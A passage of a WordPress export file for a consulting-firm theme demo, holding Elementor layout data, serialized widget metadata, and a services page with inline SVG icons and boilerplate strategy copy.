retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"018e51c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9b39923","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a1952ca","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-service-detail2.jpg","id":970},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"ec49fa5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b5272a","elType":"widget","settings":{"sub":"our benefits","title":"Why Clients Choose Us","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"2d7dbb6","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"d6df67f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"80fa6cf","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#FF8F3E","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"a9e257f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4ea034c","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#FF8F3E","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"f4ad5a2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"70ad7d9","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#FF8F3E","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2b09e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a5a983f","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"bg_box":"#FFFFFF","bg_hover_box":"#FF8F3E","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d701907","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"52","right":"0","bottom":"55","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"b3a944d","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"4c35005","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"cab11a6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"27d6af4","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"12e765f","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"f7ba0c1","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"gap":"extended","content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cae27a3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cafb16e","elType":"widget","settings":{"sub":"reliable & safe","title":"Our Strategy Development","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":24,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"ce3460e","elType":"widget","settings":{"ot_tabs":[{"tab_title":"Research","tab_content":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"ee4235d"},{"tab_title":"aproach","tab_content":"<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"768bb7a"},{"tab_title":"result","tab_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.<\/p>","_id":"3a5c920"}],"title_space":{"unit":"px","size":0,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"40","bottom":"40","left":"0","isLinked":false},"title_width_mobile":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"itabs"},{"id":"6e6c83a","elType":"widget","settings":{"btn_style":"dark","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false},{"id":"70eb409","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"db0c981","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"padding":{"unit":"px","top":"50","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7540ef2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d0b9d6d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service.png","id":913},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:3;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;s:27:"typography_font_size_mobile";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:9:"btn_style";i:2;s:4:"text";i:3;s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:15;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:15;s:19:"_inline_size_tablet";i:10;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:3;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:5;s:16:"content_position";i:3;}s:17:"section_structure";a:1:{s:9:"structure";i:5;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:4;s:16:"background_image";i:3;s:19:"background_position";i:3;s:26:"background_position_mobile";i:1;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:22:"background_size_tablet";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:7;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:5;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:14:"subtitle_style";i:3;s:11:"title_color";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:8:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:6:"bg_box";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:4:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;}s:21:"style_content_section";a:8:{s:27:"title_typography_typography";i:4;s:28:"title_typography_font_family";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:4;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:5:"itabs";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_tabs";i:1;}}s:5:"style";a:1:{s:11:"style_title";a:2:{s:11:"title_space";i:1;s:18:"title_width_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consulting</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/</link>
		<pubDate>Thu, 17 Sep 2020 08:25:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=977</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>Services</h6>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h6>Brochures</h6>		
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg" alt="" loading="lazy" />								</a>
			<h3>Strategic & Tactical Planning</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 